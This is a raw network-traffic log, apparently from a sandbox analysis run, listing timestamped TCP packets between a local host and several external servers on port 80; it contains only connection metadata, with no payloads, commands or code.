Apr 26, 2024 10:07:24.861433983 CEST	49715	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:24.863276958 CEST	49715	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:25.199361086 CEST	80	49715	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:25.199594975 CEST	49715	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:26.378969908 CEST	49715	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:27.399698019 CEST	49716	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:27.730415106 CEST	80	49716	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:27.730603933 CEST	49716	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:27.736918926 CEST	49716	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:28.069649935 CEST	80	49716	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:28.069783926 CEST	49716	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:29.459942102 CEST	49716	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:30.475368023 CEST	49717	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:30.804701090 CEST	80	49717	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:30.804815054 CEST	49717	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:30.817971945 CEST	49717	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:31.147340059 CEST	80	49717	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:31.148698092 CEST	80	49717	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:31.148776054 CEST	49717	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:32.332314968 CEST	49717	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:33.351161003 CEST	49718	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:33.680237055 CEST	80	49718	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:33.680434942 CEST	49718	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:33.686688900 CEST	49718	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:34.018368006 CEST	80	49718	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:34.018611908 CEST	49718	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:34.021334887 CEST	49718	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:34.350176096 CEST	80	49718	116.50.37.244	192.168.2.9
Apr 26, 2024 10:07:39.419496059 CEST	49719	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:39.658761024 CEST	80	49719	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:39.659054041 CEST	49719	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:39.665494919 CEST	49719	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:39.904684067 CEST	80	49719	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:39.905380964 CEST	80	49719	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:39.905472040 CEST	80	49719	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:39.905546904 CEST	49719	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:41.175813913 CEST	49719	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:42.194478035 CEST	49720	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:42.433518887 CEST	80	49720	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:42.433829069 CEST	49720	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:42.440135956 CEST	49720	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:42.679161072 CEST	80	49720	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:42.679970980 CEST	80	49720	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:42.679995060 CEST	80	49720	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:42.680119038 CEST	49720	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:43.957155943 CEST	49720	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:44.975522041 CEST	49721	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:45.220561028 CEST	80	49721	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:45.220906019 CEST	49721	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:45.224057913 CEST	49721	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:45.465424061 CEST	80	49721	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:45.465441942 CEST	80	49721	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:45.466198921 CEST	80	49721	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:45.466214895 CEST	80	49721	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:45.466316938 CEST	49721	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:46.738337994 CEST	49721	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:48.497255087 CEST	49722	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:48.742515087 CEST	80	49722	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:48.742657900 CEST	49722	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:48.839662075 CEST	49722	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:49.085103989 CEST	80	49722	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:49.085828066 CEST	80	49722	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:49.085881948 CEST	80	49722	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:49.085983038 CEST	49722	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:49.088721991 CEST	49722	80	192.168.2.9	46.30.213.191
Apr 26, 2024 10:07:49.348423958 CEST	80	49722	46.30.213.191	192.168.2.9
Apr 26, 2024 10:07:54.835241079 CEST	49723	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:55.110755920 CEST	80	49723	85.159.66.93	192.168.2.9
Apr 26, 2024 10:07:55.114743948 CEST	49723	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:55.121920109 CEST	49723	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:55.397742033 CEST	80	49723	85.159.66.93	192.168.2.9
Apr 26, 2024 10:07:55.457580090 CEST	80	49723	85.159.66.93	192.168.2.9
Apr 26, 2024 10:07:55.460627079 CEST	49723	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:56.628770113 CEST	49723	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:57.650515079 CEST	49724	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:57.927045107 CEST	80	49724	85.159.66.93	192.168.2.9
Apr 26, 2024 10:07:57.927274942 CEST	49724	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:57.930514097 CEST	49724	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:58.206931114 CEST	80	49724	85.159.66.93	192.168.2.9
Apr 26, 2024 10:07:58.266541958 CEST	80	49724	85.159.66.93	192.168.2.9
Apr 26, 2024 10:07:58.266598940 CEST	49724	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:07:59.441472054 CEST	49724	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:00.462587118 CEST	49725	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:00.738343954 CEST	80	49725	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:00.738444090 CEST	49725	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:00.741560936 CEST	49725	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:01.017482042 CEST	80	49725	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:01.083199024 CEST	80	49725	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:01.085654020 CEST	80	49725	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:01.085845947 CEST	49725	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:02.253993034 CEST	49725	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:03.272860050 CEST	49726	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:03.548549891 CEST	80	49726	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:03.548861027 CEST	49726	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:03.550745010 CEST	49726	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:03.830569029 CEST	80	49726	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:03.835184097 CEST	49726	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:03.838521004 CEST	49726	80	192.168.2.9	85.159.66.93
Apr 26, 2024 10:08:04.113636017 CEST	80	49726	85.159.66.93	192.168.2.9
Apr 26, 2024 10:08:09.047393084 CEST	49727	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:09.290339947 CEST	80	49727	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:09.294449091 CEST	49727	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:09.294449091 CEST	49727	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:09.538532972 CEST	80	49727	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:09.538590908 CEST	80	49727	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:09.538764000 CEST	49727	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:10.800755978 CEST	49727	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:11.820533037 CEST	49728	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:12.063169956 CEST	80	49728	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:12.064769983 CEST	49728	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:12.068526983 CEST	49728	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:12.312338114 CEST	80	49728	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:12.312381983 CEST	80	49728	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:12.312458992 CEST	49728	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:13.584512949 CEST	49728	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:14.601397991 CEST	49729	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:14.844149113 CEST	80	49729	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:14.844393015 CEST	49729	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:14.846537113 CEST	49729	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:15.089453936 CEST	80	49729	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:15.091285944 CEST	80	49729	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:15.091379881 CEST	80	49729	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:15.091432095 CEST	49729	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:16.363183022 CEST	49729	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.381947041 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.624274969 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.624494076 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.626749992 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.910263062 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931377888 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931438923 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931508064 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931555033 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931567907 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.931633949 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931700945 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931749105 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931786060 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931823969 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.931859970 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931921959 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:17.931943893 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:17.932149887 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:18.173758030 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.173813105 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.173854113 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.173894882 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.173932076 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.173969030 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.174007893 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.174046993 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:18.177664995 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:18.180970907 CEST	49730	80	192.168.2.9	91.195.240.94
Apr 26, 2024 10:08:18.423082113 CEST	80	49730	91.195.240.94	192.168.2.9
Apr 26, 2024 10:08:31.978598118 CEST	49731	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:32.171571016 CEST	80	49731	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:32.172702074 CEST	49731	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:32.174668074 CEST	49731	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:32.367497921 CEST	80	49731	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:32.378321886 CEST	80	49731	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:32.378334045 CEST	80	49731	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:32.378390074 CEST	49731	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:33.678800106 CEST	49731	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:34.696711063 CEST	49732	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:34.890990973 CEST	80	49732	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:34.891083002 CEST	49732	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:34.892963886 CEST	49732	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:35.091620922 CEST	80	49732	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:35.100095034 CEST	80	49732	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:35.100111961 CEST	80	49732	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:35.100183010 CEST	49732	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:36.561075926 CEST	49732	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:37.569780111 CEST	49733	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:37.762259007 CEST	80	49733	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:37.762382030 CEST	49733	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:37.764691114 CEST	49733	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:37.957496881 CEST	80	49733	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:37.967094898 CEST	80	49733	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:37.967148066 CEST	80	49733	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:37.967272043 CEST	49733	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:39.269462109 CEST	49733	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:40.288423061 CEST	49734	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:40.484390974 CEST	80	49734	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:40.486710072 CEST	49734	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:40.488677979 CEST	49734	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:40.681653023 CEST	80	49734	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:40.692908049 CEST	80	49734	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:40.693200111 CEST	80	49734	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:40.693336010 CEST	49734	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:40.696537018 CEST	49734	80	192.168.2.9	66.29.149.46
Apr 26, 2024 10:08:40.889487028 CEST	80	49734	66.29.149.46	192.168.2.9
Apr 26, 2024 10:08:46.310537100 CEST	49735	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:46.556998968 CEST	80	49735	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:46.557157040 CEST	49735	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:46.559204102 CEST	49735	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:46.805027008 CEST	80	49735	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:46.807281017 CEST	80	49735	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:46.807534933 CEST	80	49735	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:46.807631969 CEST	49735	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:48.066426992 CEST	49735	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:49.086550951 CEST	49736	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:49.332290888 CEST	80	49736	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:49.332418919 CEST	49736	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:49.335047007 CEST	49736	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:49.582222939 CEST	80	49736	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:49.586144924 CEST	80	49736	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:49.586396933 CEST	80	49736	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:49.586471081 CEST	49736	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:50.847651005 CEST	49736	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:51.866714001 CEST	49737	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:52.112582922 CEST	80	49737	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:52.112777948 CEST	49737	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:52.114691973 CEST	49737	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:52.360137939 CEST	80	49737	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:52.360183954 CEST	80	49737	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:52.364010096 CEST	80	49737	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:52.364187002 CEST	80	49737	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:52.364614964 CEST	49737	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:53.628850937 CEST	49737	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:54.648699045 CEST	49738	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:54.894561052 CEST	80	49738	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:54.894947052 CEST	49738	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:54.897069931 CEST	49738	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:55.144345999 CEST	80	49738	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:55.150346041 CEST	80	49738	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:55.150800943 CEST	80	49738	195.110.124.133	192.168.2.9
Apr 26, 2024 10:08:55.150902987 CEST	49738	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:55.154515982 CEST	49738	80	192.168.2.9	195.110.124.133
Apr 26, 2024 10:08:55.408354998 CEST	80	49738	195.110.124.133	192.168.2.9
Apr 26, 2024 10:09:00.510548115 CEST	49739	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:00.635078907 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.635329962 CEST	49739	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:00.637531042 CEST	49739	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:00.761991978 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.819817066 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.820316076 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.820324898 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.820333004 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.820338964 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.820668936 CEST	49739	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:00.821233988 CEST	80	49739	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:00.821557999 CEST	49739	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:02.144486904 CEST	49739	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.162930965 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.288274050 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.288362026 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.296176910 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.423429012 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477520943 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477555037 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477615118 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477622032 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.477760077 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477781057 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477816105 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.477828979 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.477849960 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:03.478097916 CEST	80	49740	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:03.478147030 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:04.800707102 CEST	49740	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:05.820581913 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:05.945554018 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:05.945636988 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:05.947901011 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:06.072776079 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.072788954 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122335911 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122379065 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122476101 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122495890 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:06.122499943 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122519016 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122538090 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.122553110 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:06.122587919 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:06.123009920 CEST	80	49741	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:06.123091936 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:07.532324076 CEST	49741	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:08.942687035 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.067883015 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.070538998 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.304909945 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.430229902 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.495692968 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.495714903 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.495815992 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.495944023 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.496192932 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496206999 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496344090 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.496381998 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496392012 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496412039 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496439934 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496444941 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496447086 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.496467113 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496515989 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.496515989 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.496689081 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496701002 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496722937 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496737003 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.496764898 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.496820927 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.497301102 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.497395039 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.497594118 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.497749090 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.497764111 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:09.497822046 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.497822046 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.634114981 CEST	49742	80	192.168.2.9	23.227.38.74
Apr 26, 2024 10:09:09.758827925 CEST	80	49742	23.227.38.74	192.168.2.9
Apr 26, 2024 10:09:15.847592115 CEST	49743	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:16.005103111 CEST	80	49743	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:16.006623983 CEST	49743	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:16.011919022 CEST	49743	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:16.169558048 CEST	80	49743	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:16.347203970 CEST	80	49743	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:16.347220898 CEST	80	49743	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:16.347270012 CEST	49743	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:17.520129919 CEST	49743	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:18.540297031 CEST	49744	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:18.698039055 CEST	80	49744	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:18.698132038 CEST	49744	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:18.700666904 CEST	49744	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:18.858474016 CEST	80	49744	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:19.036030054 CEST	80	49744	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:19.036047935 CEST	80	49744	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:19.036154032 CEST	49744	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:20.208530903 CEST	49744	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:21.225683928 CEST	49745	80	192.168.2.9	34.111.148.214
